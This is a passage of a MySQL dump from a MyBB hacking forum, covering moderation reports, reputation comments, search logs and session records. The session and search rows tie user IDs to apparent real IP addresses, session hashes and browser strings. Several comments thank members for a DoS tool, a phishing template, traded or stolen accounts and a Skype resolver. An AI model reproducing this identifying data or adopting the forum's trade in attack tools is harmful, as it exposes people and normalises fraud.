INSERT INTO mybb_reportedposts VALUES('3', '507', '168', '3', '54', '1', 'Nonsense(Other)', '1345560279'); INSERT INTO mybb_reportedposts VALUES('4', '732', '163', '30', '5', '1', 'Nonsense(Other)', '1345816907'); INSERT INTO mybb_reportedposts VALUES('6', '754', '17', '8', '82', '1', 'SPAM', '1345819861'); INSERT INTO mybb_reportedposts VALUES('7', '175', '74', '12', '90', '1', 'SPAM', '1345904354'); INSERT INTO mybb_reportedposts VALUES('8', '917', '32', '16', '82', '1', 'SPAM', '1345949627'); INSERT INTO mybb_reportedposts VALUES('9', '1068', '251', '3', '1', '1', 'LQP', '1346017619'); INSERT INTO mybb_reportedposts VALUES('10', '1117', '253', '56', '67', '1', 'Nonsense(Other)', '1346076152'); INSERT INTO mybb_reportedposts VALUES('12', '1253', '191', '15', '67', '1', 'LQP', '1346187979'); INSERT INTO mybb_reportedposts VALUES('13', '1353', '288', '52', '82', '1', 'Wrong forum', '1346338192'); INSERT INTO mybb_reportedposts VALUES('14', '1359', '291', '7', '82', '1', 'SPAM', '1346350136'); INSERT INTO mybb_reportedposts VALUES('15', '1377', '297', '7', '67', '1', 'Personal info', '1346416995'); INSERT INTO mybb_reportedposts VALUES('16', '1509', '320', '34', '82', '1', 'SPAM', '1347226968'); INSERT INTO mybb_reportedposts VALUES('18', '1781', '388', '58', '7', '1', 'Wrong forum', '1347412589'); INSERT INTO mybb_reportedposts VALUES('19', '849', '212', '58', '82', '1', 'Nonsense(Other)', '1347414176'); INSERT INTO mybb_reportedposts VALUES('22', '1765', '383', '29', '5', '1', 'Rep Abuse(Repfuck this member)', '1347748713'); INSERT INTO mybb_reportedposts VALUES('27', '2540', '510', '19', '82', '1', 'Nonsense(Other)', '1348713030'); INSERT INTO mybb_reportedposts VALUES('29', '2746', '547', '15', '82', '1', 'Nonsense(Other)', '1348871254'); INSERT INTO mybb_reportedposts VALUES('30', '2867', '593', '15', '5', '1', 'Wrong forum', '1348968668'); INSERT INTO mybb_reportedposts VALUES('31', '2854', '587', '7', '10', '1', 'Wrong forum', '1348980377'); INSERT INTO mybb_reportedposts VALUES('33', '2944', '609', '58', '1', '1', 'Nonsense(Other)', '1348984763'); INSERT INTO mybb_reportedposts VALUES('34', '2907', '597', '3', '1', '1', 'Nonsense(Other)', '1348984931'); INSERT INTO mybb_reportedposts VALUES('35', '2886', '597', '3', '1', '1', 'Nonsense(Other)', '1348985304'); INSERT INTO mybb_reportedposts VALUES('36', '2201', '466', '13', '214', '1', 'Leech', '1349220232'); INSERT INTO mybb_reportedposts VALUES('37', '283', '112', '9', '82', '1', 'Personal info', '1349305592'); INSERT INTO mybb_reportedposts VALUES('38', '3408', '670', '46', '5', '1', 'Wrong forum', '1349408010'); INSERT INTO mybb_reportedposts VALUES('41', '2806', '565', '20', '214', '1', 'LQP', '1349865126'); INSERT INTO mybb_reportedposts VALUES('42', '3895', '764', '15', '5', '1', 'Nonsense(Other)', '1350005769'); INSERT INTO mybb_reportedposts VALUES('43', '4454', '845', '72', '254', '1', 'Threats', '1350124968'); INSERT INTO mybb_reportedposts VALUES('44', '4483', '851', '9', '3', '1', 'Nonsense(Other)', '1350151299'); INSERT INTO mybb_reportedposts VALUES('45', '4592', '859', '3', '8', '1', 'Wrong forum', '1350202274'); INSERT INTO mybb_reportedposts VALUES('46', '4886', '894', '21', '214', '1', 'SPAM', '1350418286'); INSERT INTO mybb_reportedposts VALUES('47', '2922', '603', '47', '214', '1', 'LQP', '1350427548'); INSERT INTO mybb_reportedposts VALUES('48', '4897', '897', '65', '4', '1', 'Wrong forum', '1350438108'); INSERT INTO mybb_reportedposts VALUES('49', '5014', '909', '7', '222', '1', 'Rep Abuse', '1350448392'); INSERT INTO mybb_reportedposts VALUES('50', '5271', '941', '3', '222', '1', 'Wrong forum', '1350546737'); INSERT INTO mybb_reportedposts VALUES('51', '5454', '973', '7', '258', '1', 'Adult Content', '1350631764'); INSERT INTO mybb_reportedposts VALUES('52', '5593', '992', '17', '4', '1', 'Nonsense(Other)', '1350847631'); INSERT INTO mybb_reportedposts VALUES('53', '6046', '1046', '16', '1', '1', 'Wrong forum', '1350882149'); INSERT INTO mybb_reportedposts VALUES('54', '5288', '945', '7', '82', '1', 'Nonsense(Other)', '1350906129'); INSERT INTO mybb_reportedposts VALUES('55', '5956', '1031', '7', '9', '1', 'LQP', '1350937889'); INSERT INTO mybb_reportedposts VALUES('56', '6225', '613', '66', '82', '1', 'LQP', '1351031957'); INSERT INTO mybb_reportedposts VALUES('57', '6357', '1096', '7', '82', '1', 'LQP', '1351198495'); INSERT INTO mybb_reportedposts VALUES('58', '6409', '1101', '49', '222', '1', 'Nonsense(Other)', '1351235908'); INSERT INTO mybb_reportedposts VALUES('59', '6341', '1093', '7', '82', '1', 'Nonsense(Other)', '1351279055'); INSERT INTO mybb_reportedposts VALUES('61', '6743', '1156', '65', '4', '1', 'Wrong forum', '1351750242'); INSERT INTO mybb_reportedposts VALUES('62', '5258', '937', '68', '4', '1', 'SPAM', '1351750645'); INSERT INTO mybb_reportedposts VALUES('63', '6879', '1158', '74', '82', '1', 'LQP', '1351802496'); INSERT INTO mybb_reportedposts VALUES('64', '6805', '1158', '74', '82', '1', 'LQP', '1351802514'); INSERT INTO mybb_reportedposts VALUES('65', '274', '111', '29', '5', '1', 'Nonsense(Other)', '1351917325'); INSERT INTO mybb_reportedposts VALUES('67', '6706', '1144', '13', '4', '1', 'Wrong forum', '1351918893'); INSERT INTO mybb_reportedposts VALUES('68', '7045', '1195', '47', '67', '1', 'Nonsense(Other)', '1352209965'); INSERT INTO mybb_reportedposts VALUES('69', '7179', '1218', '17', '67', '1', 'Nonsense(Other)', '1352326349'); INSERT INTO mybb_reportedposts VALUES('71', '7269', '1227', '4', '2', '1', 'Nonsense(Other)', '1352433298'); INSERT INTO mybb_reportedposts VALUES('72', '7280', '1231', '15', '82', '1', 'Nonsense(Other)', '1352495852'); INSERT INTO mybb_reportedposts VALUES('75', '7445', '861', '7', '82', '1', 'LQP', '1352597835'); DROP TABLE IF EXISTS mybb_reputation; CREATE TABLE mybb_reputation ( rid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, adduid int(10) unsigned NOT NULL, pid int(10) unsigned NOT NULL, reputation bigint(30) NOT NULL, dateline bigint(30) NOT NULL, comments text NOT NULL, PRIMARY KEY (rid), KEY uid (uid), KEY pid (pid), KEY dateline (dateline) ); INSERT INTO mybb_reputation VALUES('1', '0', '1', '0', '-25', '1339906486', 'Congratulations, you have been repfucked.'); INSERT INTO mybb_reputation VALUES('2', '0', '3', '0', '-25', '1339906597', 'Great Admin'); INSERT INTO mybb_reputation VALUES('11', '1', '3', '0', '10', '1339984219', 'Famous joker'); INSERT INTO mybb_reputation VALUES('12', '1', '2', '0', '10', '1339991036', 'A good buddy of mine :P'); INSERT INTO mybb_reputation VALUES('10', '2', '1', '0', '10', '1339981488', 'Sup bro? welcome to l33thacking.com'); INSERT INTO mybb_reputation VALUES('16', '2', '3', '0', '10', '1340055032', 'Wassup bro, You are a great admin'); INSERT INTO mybb_reputation VALUES('38', '20', '1', '0', '10', '1345556205', 'No no no, Don\'t repfuck yourself.'); INSERT INTO mybb_reputation VALUES('18', '1', '20', '0', '6', '1343925337', 'Excellent Administrator.'); INSERT INTO mybb_reputation VALUES('23', '5', '1', '0', '5', '1344966144', 'Thanks for contributing to LH'); INSERT INTO mybb_reputation VALUES('24', '55', '1', '0', '10', '1344993611', 'Lol, I\'m the founder but thanks for joining.'); INSERT INTO mybb_reputation VALUES('25', '1', '55', '0', '3', '1344993726', 'Admins that don\'t follow rules...Good job! ;D'); INSERT INTO mybb_reputation VALUES('26', '62', '1', '0', '10', '1345148956', 'There are no words to describe how good you are at graphics.'); INSERT INTO mybb_reputation VALUES('141', '1', '61', '0', '10', '1350755969', 'Keep Moving us forward. You\'re doing a very good job here.'); INSERT INTO mybb_reputation VALUES('28', '61', '1', '0', '10', '1352249588', 'Great Admin'); INSERT INTO mybb_reputation VALUES('29', '60', '1', '0', '5', '1345209643', '\"Hacking is a art\" LOL I love this quote.'); INSERT INTO mybb_reputation VALUES('30', '54', '62', '0', '3', '1345225212', 'thanks for the ebook'); INSERT INTO mybb_reputation VALUES('31', '64', '1', '0', '5', '1345244525', 'Phishing theme template or whatever service'); INSERT INTO mybb_reputation VALUES('32', '67', '54', '0', '1', '1345263400', 'Thanks for the fix....'); INSERT INTO mybb_reputation VALUES('33', '61', '54', '0', '1', '1345263766', 'Keep up the good share in VIP section.'); INSERT INTO mybb_reputation VALUES('34', '54', '55', '0', '3', '1345328603', 'You are really helpful.'); INSERT INTO mybb_reputation VALUES('82', '1', '82', '0', '4', '1348713428', 'Oh you fancy huh?'); INSERT INTO mybb_reputation VALUES('83', '203', '61', '0', '6', '1349402194', 'I like you to homie, Stay Active!'); INSERT INTO mybb_reputation VALUES('39', '82', '1', '0', '10', '1345590940', 'Too HQ. Thanks for being so active on your first day. Your activity has helped LH a lot.'); INSERT INTO mybb_reputation VALUES('41', '62', '90', '0', '3', '1345738161', 'thanks for razor ebook'); INSERT INTO mybb_reputation VALUES('42', '90', '62', '0', '3', '1345749889', 'thanks for the ebooks.'); INSERT INTO mybb_reputation VALUES('43', '82', '5', '0', '3', '1345768655', 'This guy right here is a GENIASS'); INSERT INTO mybb_reputation VALUES('143', '200', '82', '0', '1', '1350846270', 'Nice HQ User. I like ;) Green Apples'); INSERT INTO mybb_reputation VALUES('45', '1', '54', '0', '3', '1345792251', 'These are max green apples that i can send you.. enjoy :)'); INSERT INTO mybb_reputation VALUES('46', '54', '1', '0', '10', '1345817407', 'Oh yeah? Guess what this is the most I can send :P'); INSERT INTO mybb_reputation VALUES('49', '67', '1', '0', '10', '1345854542', 'Why the heck didn\'t I ever +rep you before?'); INSERT INTO mybb_reputation VALUES('51', '67', '61', '0', '4', '1345914849', 'Amazing person! will go far here.'); INSERT INTO mybb_reputation VALUES('56', '1', '141', '0', '3', '1346200772', 'Thank you for all of your uploads/shares'); INSERT INTO mybb_reputation VALUES('57', '141', '1', '0', '10', '1346253847', 'Thanks and welcome to LH.'); INSERT INTO mybb_reputation VALUES('58', '8', '67', '0', '3', '1346259659', 'Thanks for the DoSer! http://l33thacking.com/showthread.php?tid=48'); INSERT INTO mybb_reputation VALUES('59', '84', '67', '0', '3', '1346273964', 'Thanks! http://l33thacking.com/showthread.php?tid=281'); INSERT INTO mybb_reputation VALUES('70', '82', '61', '0', '6', '1347077833', 'I enjoy this guy. Hes awesome, Stay HQ'); INSERT INTO mybb_reputation VALUES('61', '55', '2', '0', '10', '1346469610', 'Respect for: Stop being an asshole and picking on him. :)'); INSERT INTO mybb_reputation VALUES('62', '2', '55', '0', '3', '1346479949', 'Looks like a great guy, not sure why iPod keeps talking shit. :/'); INSERT INTO mybb_reputation VALUES('63', '84', '1', '0', '10', '1346646817', 'Grrr. It is a important announcement because I\'m important :P'); INSERT INTO mybb_reputation VALUES('65', '112', '1', '0', '5', '1346861183', 'Thanks for contributing and I have been looking for a nike SE method.'); INSERT INTO mybb_reputation VALUES('67', '156', '61', '0', '4', '1346873334', 'Nice name.'); INSERT INTO mybb_reputation VALUES('68', '156', '138', '0', '-3', '1346875031', 'Fanboy.......'); INSERT INTO mybb_reputation VALUES('69', '53', '1', '0', '10', '1347069612', 'Not anymore'); INSERT INTO mybb_reputation VALUES('72', '9', '82', '0', '4', '1347105161', 'You\'re very HQ. And I want you to stay like that. =]'); INSERT INTO mybb_reputation VALUES('73', '166', '1', '0', '10', '1347122861', 'Why didn\'t I ever +rep you before?'); INSERT INTO mybb_reputation VALUES('74', '61', '82', '0', '4', '1347402854', 'Funny.. Funny man. =] How do you like them apples?'); INSERT INTO mybb_reputation VALUES('75', '100', '82', '0', '4', '1347633689', 'Legit Service. A+ Recommended. =] -iTzIpod'); INSERT INTO mybb_reputation VALUES('76', '82', '112', '0', '3', '1347643652', 'Nice ebook'); INSERT INTO mybb_reputation VALUES('78', '53', '82', '0', '3', '1351636056', 'Adfoc.us views Trusted and HQ member.'); INSERT INTO mybb_reputation VALUES('79', '62', '82', '0', '4', '1347825813', 'You\'re the definition of a GFX Master.'); INSERT INTO mybb_reputation VALUES('80', '194', '61', '0', '6', '1348107288', 'I really hope slenderman isn\'t real..'); INSERT INTO mybb_reputation VALUES('81', '194', '82', '0', '4', '1348108281', 'You\'re so cool ;) :cool:'); INSERT INTO mybb_reputation VALUES('84', '203', '1', '0', '5', '1348887626', 'Nice sig :) and thanks for joining and being HQ'); INSERT INTO mybb_reputation VALUES('85', '1', '203', '0', '3', '1348887739', 'Sexy motha fuka HERE! :)'); INSERT INTO mybb_reputation VALUES('86', '1', '100', '0', '1', '1348889714', 'Nice guy ;D'); INSERT INTO mybb_reputation VALUES('87', '82', '100', '0', '1', '1348924476', 'I love this guy ;D'); INSERT INTO mybb_reputation VALUES('88', '203', '5', '0', '3', '1348969207', 'Useful contributoins.'); INSERT INTO mybb_reputation VALUES('89', '100', '1', '0', '5', '1348977358', 'Legit service. Thanks'); INSERT INTO mybb_reputation VALUES('90', '62', '3', '0', '3', '1349024989', 'Thanks for the sig, I appreciate it.'); INSERT INTO mybb_reputation VALUES('91', '62', '100', '0', '3', '1350414431', 'You have the sexiest GFX work. Your also really nice and have helped me out a few times. Keep it up man, glad to see such a HQ guy on LH ;D'); INSERT INTO mybb_reputation VALUES('92', '62', '203', '0', '3', '1349887615', 'made me a sexy ass sig and group userbar!'); INSERT INTO mybb_reputation VALUES('93', '199', '1', '0', '10', '1349138584', 'Thanks for coming online daily and being active daily.'); INSERT INTO mybb_reputation VALUES('96', '3', '100', '0', '3', '1349873228', 'HQ guy, keep it up bro ;)'); INSERT INTO mybb_reputation VALUES('97', '203', '82', '0', '4', '1349396489', 'NL is so sexy <3'); INSERT INTO mybb_reputation VALUES('99', '61', '203', '0', '3', '1349401903', 'a really nice cooperative guy :) i like you...'); INSERT INTO mybb_reputation VALUES('101', '222', '1', '0', '5', '1350610357', 'Welcome to L33T Hacking! Edited: True don\'t spam the general section'); INSERT INTO mybb_reputation VALUES('102', '3', '1', '0', '3', '1349494749', 'Good Luck!'); INSERT INTO mybb_reputation VALUES('103', '3', '222', '0', '3', '1349496452', 'Get your rep back up :D'); INSERT INTO mybb_reputation VALUES('104', '225', '61', '0', '6', '1349500416', 'My bestest friend'); INSERT INTO mybb_reputation VALUES('106', '100', '3', '0', '3', '1349909575', 'HQ and Legit guy'); INSERT INTO mybb_reputation VALUES('107', '203', '3', '0', '-4', '1349920225', 'Bye Have A Great Time, http://www.youtube.com/watch?v=WUl9NPPMx8s'); INSERT INTO mybb_reputation VALUES('108', '228', '62', '0', '1', '1349967186', 'thanks alot :)'); INSERT INTO mybb_reputation VALUES('110', '254', '257', '0', '2', '1350184682', 'greed is a very nice user and HQ poster keep up the good work'); INSERT INTO mybb_reputation VALUES('111', '82', '257', '0', '3', '1350184837', 'a really nice user and he gave me what i wanted keep up the good work'); INSERT INTO mybb_reputation VALUES('112', '205', '1', '0', '10', '1350194133', 'How the heck did I never rep you before?'); INSERT INTO mybb_reputation VALUES('113', '82', '62', '0', '3', '1350229398', 'stay HQ bro :D'); INSERT INTO mybb_reputation VALUES('119', '254', '82', '0', '-1', '1350356648', 'Greed is a scammer. Traded a MC account for a AQW account and he changed the password in less that 24 hours.'); INSERT INTO mybb_reputation VALUES('129', '228', '82', '0', '1', '1350595406', 'Keep it up :)'); INSERT INTO mybb_reputation VALUES('116', '1', '205', '0', '3', '1350268457', 'A great job with the forum, and certainly a great Admin.'); INSERT INTO mybb_reputation VALUES('117', '4', '228', '0', '1', '1350347255', 'Thanks For The Congratz :P'); INSERT INTO mybb_reputation VALUES('118', '62', '228', '0', '2', '1350348319', 'Thanks for the +1 Rep'); INSERT INTO mybb_reputation VALUES('120', '228', '100', '0', '2', '1350395045', 'HQ guy, keep it up bro ;)'); INSERT INTO mybb_reputation VALUES('121', '100', '62', '0', '3', '1350399164', 'thanks bro :)'); INSERT INTO mybb_reputation VALUES('122', '1', '228', '0', '4', '1350424193', 'Thank you for inviting me to this forum. I really like it here'); INSERT INTO mybb_reputation VALUES('123', '257', '222', '0', '3', '1350457287', 'YUNO have any rep yet? Op NVM lmao'); INSERT INTO mybb_reputation VALUES('140', '222', '61', '0', '10', '1350755927', 'One of my favorite users here.'); INSERT INTO mybb_reputation VALUES('125', '62', '5', '0', '3', '1350530099', 'Lol you just posted.'); INSERT INTO mybb_reputation VALUES('126', '270', '53', '0', '3', '1350553876', 'Friendly member. Owner of efyu.net!'); INSERT INTO mybb_reputation VALUES('127', '257', '62', '0', '3', '1350554306', 'Thanks for the minecraft account bro :)'); INSERT INTO mybb_reputation VALUES('128', '61', '100', '0', '3', '1350564292', 'Your a nice moderator(:'); INSERT INTO mybb_reputation VALUES('130', '278', '228', '0', '4', '1350600966', 'Welcome Buddy'); INSERT INTO mybb_reputation VALUES('131', '214', '62', '0', '3', '1350637167', 'Thanks for the skype resolver.'); INSERT INTO mybb_reputation VALUES('132', '258', '62', '0', '3', '1350650091', 'Nice tutorials, keep it up bro'); INSERT INTO mybb_reputation VALUES('135', '205', '222', '0', '3', '1350707190', 'Nice share...rep back ? <3'); INSERT INTO mybb_reputation VALUES('136', '255', '62', '0', '3', '1350724652', 'Thanks for the accounts :)'); INSERT INTO mybb_reputation VALUES('137', '228', '53', '0', '3', '1350730305', 'Nice member, very friendly'); INSERT INTO mybb_reputation VALUES('138', '53', '228', '0', '3', '1350730393', 'Always ready to help, Keep it Up'); INSERT INTO mybb_reputation VALUES('139', '222', '205', '0', '3', '1350732872', 'Elite member who deserves this.'); INSERT INTO mybb_reputation VALUES('142', '172', '258', '0', '2', '1350802201', 'Great shares :D'); INSERT INTO mybb_reputation VALUES('144', '1', '257', '0', '3', '1350865315', 'THE GREATEST STAFF EVER XD'); INSERT INTO mybb_reputation VALUES('145', '228', '257', '0', '3', '1350865748', 'The nicest guy ever :)'); INSERT INTO mybb_reputation VALUES('146', '2', '257', '0', '3', '1351306115', 'the greatest staff ever XD'); INSERT INTO mybb_reputation VALUES('147', '61', '257', '0', '3', '1350869015', 'one of the greatest staff ever XD'); INSERT INTO mybb_reputation VALUES('148', '205', '257', '0', '3', '1350873001', 'a great and HQ user keep up the good work :)'); INSERT INTO mybb_reputation VALUES('149', '257', '1', '0', '5', '1350874783', 'Are you sure? Lol'); INSERT INTO mybb_reputation VALUES('150', '61', '222', '0', '3', '1350875968', 'YOLO BROMO YUSO FOSHO FROLO'); INSERT INTO mybb_reputation VALUES('151', '1', '62', '0', '3', '1350900684', 'great admin :)'); INSERT INTO mybb_reputation VALUES('152', '255', '53', '0', '0', '1351005430', 'Dont like you.. Dont know why.'); INSERT INTO mybb_reputation VALUES('153', '291', '257', '0', '3', '1351130169', 'Welcome my freind :O'); INSERT INTO mybb_reputation VALUES('154', '53', '257', '0', '3', '1351340728', 'Just a great user'); INSERT INTO mybb_reputation VALUES('155', '257', '53', '0', '2', '1351340788', 'Active and friendly user. <3 u'); INSERT INTO mybb_reputation VALUES('156', '7', '258', '0', '2', '1351404017', 'Thanks for the fonts :)'); INSERT INTO mybb_reputation VALUES('157', '7', '67', '0', '3', '1351507998', 'Thank you for making my pc faster! :D'); INSERT INTO mybb_reputation VALUES('158', '313', '257', '0', '3', '1351876815', 'hey man i am the referer so yeah and a good mate LOL'); INSERT INTO mybb_reputation VALUES('159', '160', '1', '0', '3', '1352224109', 'nice you sig is eye catching'); INSERT INTO mybb_reputation VALUES('160', '324', '257', '0', '3', '1352450653', 'Hoping to get that vouch'); DROP TABLE IF EXISTS mybb_searchlog; CREATE TABLE mybb_searchlog ( sid varchar(32) NOT NULL, uid int(10) unsigned NOT NULL, dateline bigint(30) NOT NULL, ipaddress varchar(120) NOT NULL, threads longtext NOT NULL, posts longtext NOT NULL, resulttype varchar(10) NOT NULL, querycache text NOT NULL, keywords text NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_searchlog VALUES('89928b482f6baaf1813bc6f4b604daa5', '342', '1352675605', '96.21.227.16', '', '', 'threads', 't.uid=\'342\' AND t.fid NOT IN (\'31\',\'36\',\'5\',\'48\',\'19\',\'50\',\'2\',\'45\',\'55\',\'28\',\'29\',\'54\',\'30\',\'84\',\'44\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'66\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'342\') OR t.fid NOT IN(50))', ''); INSERT INTO mybb_searchlog VALUES('921ccea1985e45f8b1b937d9d72df592', '342', '1352677845', '96.21.227.16', '', '', 'threads', 't.uid=\'342\' AND t.fid NOT IN (\'31\',\'36\',\'5\',\'48\',\'19\',\'50\',\'2\',\'45\',\'55\',\'28\',\'29\',\'54\',\'30\',\'84\',\'44\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'66\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'342\') OR t.fid NOT IN(50))', ''); INSERT INTO mybb_searchlog VALUES('8b1b98e863f4f643e84c683374775e7a', '1', '1352678819', '72.231.24.165', '', '', 'threads', 't.lastpost >=\'1352592419\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); INSERT INTO mybb_searchlog VALUES('cf5e96237feac3f4ab455457989c74bd', '257', '1352679155', '203.104.11.6', '', '', 'threads', 't.lastpost >=\'1352592755\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); INSERT INTO mybb_searchlog VALUES('1a41116a721f64fdcbe994f433c5d186', '257', '1352679646', '203.104.11.3', '', '', 'threads', 't.lastpost >=\'1352593246\' AND t.fid NOT IN (\'36\',\'5\',\'48\',\'19\',\'2\',\'37\',\'39\',\'40\',\'41\',\'38\',\'61\',\'79\',\'81\',\'82\') AND t.fid NOT IN (36,37,39,40,41,38)AND ((t.fid IN(50) AND t.uid=\'257\') OR t.fid NOT IN(50))', ''); DROP TABLE IF EXISTS mybb_sessions; CREATE TABLE mybb_sessions ( sid varchar(32) NOT NULL, uid int(10) unsigned NOT NULL, ip varchar(40) NOT NULL, time bigint(30) NOT NULL, location varchar(150) NOT NULL, useragent varchar(100) NOT NULL, anonymous int(1) NOT NULL, nopermission int(1) NOT NULL, location1 int(10) NOT NULL, location2 int(10) NOT NULL, PRIMARY KEY (sid), KEY location1 (location1), KEY location2 (location2), KEY time (time), KEY uid (uid), KEY ip (ip) ); INSERT INTO mybb_sessions VALUES('a7d59fa7486ec85d320b08fe2a2701ab', '6', '77.253.195.126', '1341496717', '/usercp.php?action=email', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('04711c808fe83ad7ba4fbd1d1b3ea1f8', '10', '86.186.29.81', '1341932665', '/search.php?&amp;action=do_search', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('594bdfc150fd7cb13be6a6dfbde9d2bb', '209', '94.43.75.187', '1349019810', '/showthread.php?tid=98', 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.289 Version/12.02', '0', '0', '20', '98'); INSERT INTO mybb_sessions VALUES('371789274bed8b627ce7d8d27fbdf154', '10', '81.151.165.146', '1342184206', '/showthread.php?tid=16', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '11', '16'); INSERT INTO mybb_sessions VALUES('21f1bf5da5525bfce66399810a0ef47c', '11', '78.146.232.150', '1342431612', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) RockMelt/0.16.91.472 Chrome/16.0.', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6010b035ef52dfc2d99edfc8ed3f4692', '17', '95.141.28.53', '1342354845', '/showthread.php?tid=20', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.1', '0', '0', '13', '20'); INSERT INTO mybb_sessions VALUES('27c1db5bc35c6134d29e868a009264e7', '19', '93.186.23.84', '1342471698', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=19', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9300; en-GB) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('d9a8cb07648b7baa1af2ec5feecf1e9a', '138', '71.207.111.91', '1346959057', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('5a2dfbb66257d72d42e7b03d1f8322b7', '27', '80.72.152.146', '1349778347', '/showthread.php?tid=78', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '7', '78'); INSERT INTO mybb_sessions VALUES('d529a4df94212eaab985a469b7660887', '24', '97.94.186.133', '1343975842', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('46bad83386f81bdecbb272aa76a939b9', '23', '87.55.209.8', '1343947908', '/showthread.php?tid=48', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; es-es) AppleWebKit/534.46.0 (KHTML, like ', '0', '0', '21', '48'); INSERT INTO mybb_sessions VALUES('6eb2cc08fcf492ab0d1ab3cd97b07727', '31', '174.61.77.86', '1344084386', '/index.php?', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('0e1aebf4dcbff7bdb6e45f5fa44fa954', '71', '71.60.105.178', '1345242792', '/member.php?action=profile&amp;uid=71', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('0140825a6519686c2203ac4f4f1b7ff5', '44', '207.172.50.206', '1344876923', '/showthread.php?tid=52', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.75 Safari/537.1', '0', '0', '9', '52'); INSERT INTO mybb_sessions VALUES('030e13c5cb7c5d62d466a2aebb0982f3', '26', '121.54.53.253', '1344841701', '/search.php?action=results&amp;sid=3bd4223bd7ad133a5ab69491c7f659ea', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.75 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2cf9fa1af75ef85d8d5e4a1496a22b83', '45', '117.204.211.6', '1344883160', '/showthread.php?tid=30', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.18 (KHTML, like Gecko) Chrome/18.0.1010.1 Safari', '0', '0', '15', '30'); INSERT INTO mybb_sessions VALUES('3fca9735a6554648b81bddb496aef52a', '51', '180.215.45.255', '1344958318', '/search.php?action=results&amp;sid=f2a469f13b52d91bc33bf9852d3e9ae3', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.77 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('66ade9aac7087160189f817e933bf521', '56', '98.86.145.224', '1344994789', '/showthread.php?tid=77', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.77 Safari', '0', '0', '16', '77'); INSERT INTO mybb_sessions VALUES('86312ff118a36c0306346830dea2b8f9', '64', '93.87.231.108', '1345811920', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e5ec8f8b626a7b5e6c7c3afadff1a7ff', '50', '182.177.109.83', '1345601732', '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('618a8bf8ae23eb8f9fdfe25ec2e3b231', '137', '142.161.233.109', '1346124971', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('cf4576ddaefb3c1b58263cadda99190c', '70', '76.69.98.41', '1345220015', '/member.php?action=emailuser&amp;uid=67', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('d6ac285f7436d2cabe5bcf74f6769306', '60', '117.217.209.184', '1345225764', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0', 